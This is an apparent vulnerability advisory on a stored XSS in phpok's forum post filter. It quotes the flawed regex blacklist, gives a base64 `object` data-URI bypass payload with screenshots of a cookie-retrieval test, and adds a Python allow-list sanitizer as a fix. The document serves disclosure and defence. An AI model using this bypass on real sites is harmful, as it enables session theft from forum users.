### Summary:

phpok (forum/BBS feature) stored XSS

### Details:

The content filter used for forum posts is `safe_html()`, a blacklist built from regular expressions:

```php
public function safe_html($content, $clear_url = '')
{
    $content = preg_replace_callback('/<(.+)>/isU', array($this, '_clean_xss_on'), $content);
    // strip what is carried inside src and href attributes
    $content = preg_replace_callback("/<(.*)(src|href)\s*=(\"|')(.+)(\\3)(.*)>/isU", array($this, '_clean_xss_script'), $content);
    // strip unquoted values passed via src
    $content = preg_replace_callback("/<(.*)(src|href)\s*=([^\s>]+)([\s|\/|>])/isU", array($this, '_clean_xss_script2'), $content);
    // strip unsafe elements such as script, applet, style, title, iframe
    $content = preg_replace("/<(^[script|applet|style|title|iframe|frame|frameset|link]+).*>[.\n\t\r]*<\/\\1>/isU", '', $content);
    $content = preg_replace("/<\/?link.*?>/isU", "", $content);
    // strip meta tags
    $content = preg_replace('/<meta(.+)>/isU', '', $content);
    .........
    return $content;
}
```

Bypass test:

```
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
```

![QQ截图20150414182421.png](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)

Cookie retrieval test:

![QQ截图20150414182719.png](https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png)

### Proof of vulnerability:

![QQ截图20150414182421.png](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)
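The bypass works because `safe_html()` only inspects `src` and `href` and only names a fixed set of tags, so an `object` element with a `data` attribute passes every regex untouched. The robust fix is an allow-list rather than a blacklist. The example below is added here in Python and is not phpok's own PHP code; its tag and attribute lists are illustrative assumptions for a forum post. It keeps only known tags and attributes and only relative, http, https and mailto URLs, so the page's `object` payload is dropped entirely while ordinary links and images survive.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Illustrative allow-lists (an assumption for a forum post), not phpok's own policy.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "a", "img", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}  # "" means a relative URL

def url_is_safe(value):
    """Allow relative, http, https and mailto; reject data:, javascript: and everything else."""
    # Browsers ignore tab/CR/LF inside a scheme, so strip them before inspecting it.
    cleaned = re.sub(r"[\t\r\n]", "", value).strip()
    return urlparse(cleaned).scheme.lower() in SAFE_SCHEMES

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []  # rebuilt markup: allowed tags/attributes only, text always escaped

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:  # object, embed, script, iframe, ... never pass
            return
        kept = []
        for name, value in attrs:
            name = name.lower()
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops on* handlers, style, data and any other unknown attribute
            value = value or ""
            if name in URL_ATTRS and not url_is_safe(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))  # text is always entity-encoded

def safe_html(content):
    parser = AllowListSanitizer()
    parser.feed(content)
    parser.close()
    return "".join(parser.out)
```

Unknown elements vanish but their text content is kept as escaped text, which is the behaviour most forum software wants for quoted HTML.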